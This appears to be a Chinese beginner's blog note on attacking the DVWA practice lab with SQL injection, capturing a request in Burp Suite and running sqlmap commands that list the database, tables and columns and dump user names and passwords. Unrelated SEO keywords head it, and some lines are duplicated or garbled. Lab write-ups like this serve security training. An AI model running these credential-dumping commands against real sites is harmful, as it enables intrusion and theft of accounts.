甘肃锦华建设集团网站,电子商务网站建设需求分析报告,wordpress直链视频,wordpress批量导入文本使用burpsuite抓包 sql工具注入 dvwa靶场
记录一下自己重新开始学习web安全之路②。
一、准备工作
1.工具准备 sqlmap burpsuite
2.浏览器准备 火狐浏览器 设置代理。
首先#xff0c;先设置一下火狐浏览器的代理 http代理地址为127.0.0.0.1 #xff0c;端口为8080
…使用burpsuite抓包 sql工具注入 dvwa靶场
记录一下自己重新开始学习web安全之路②。
一、准备工作
1.工具准备 sqlmap burpsuite
2.浏览器准备 火狐浏览器 设置代理。
首先先设置一下火狐浏览器的代理 http代理地址为127.0.0.0.1 端口为8080
3.burpsuite 准备 将burpsuite的抓包功能打开。
注burpsuite 不抓127.0.0.1 /dvwa-master的包所以需要用本地网卡 ip/dvwa-master 访问
怎么查到本地网卡ip
在cmd中输入ipconfig 得到本地网卡ip 192.168.92.1
如果是无线网那么找无线网适配器的IPV4地址 通过本地网卡ip进入dvwa把安全等级改为low等级设置代理之后。 在搜索框输入之后点击submit。
通过burpsuite抓包得到 注抓到的包必须是注入点的包。
如 GET /dvwa-master/vulnerabilities/sqli/?id2SubmitSubmit HTTP/1.1即有id12等
然后在burpsuite中 点击Action — Save item 保存到本地。
保存之后利用sqlmap工具。首先要在cmd中先来到sqlmap的文件路径下。
目标拿账号密码数据
1.查询数据库的名称 (dvwa)
python sqlmap.py -r “C:\Users\86131\Desktop\11111.txt” --current-db -r // 指定读取本地文件
–current-db //列出当前网站数据库名称
2.查询数据表的名称 (guestbook 、users)
python sqlmap.py -r “C:\Users\86131\Desktop\11111.txt” -D dvwa --tables -D //指定数据库名称
–tables //数据表
3.查询数据列的名称 (user 、password)
python sqlmap.py -r “C:\Users\86131\Desktop\11111.txt” -D dvwa -T users --columns -T //指定数据表的名称
–columns //列出数据列的名称
4.读取数据 (user、password)
python sqlmap.py -r “C:\Users\86131\Desktop\11111.txt” -D dvwa -T users -C user,password --dump -C //指定数据列的名称
–dump // 读取数据
拿账号密码时遇到的问题
1.首先是burpsuite抓包时 火狐浏览器显示 通过百度得到解决办法 2.sqlmap更新问题可以不用管但是一开始看到有警告去官网下了一个新的sqlmap即可。
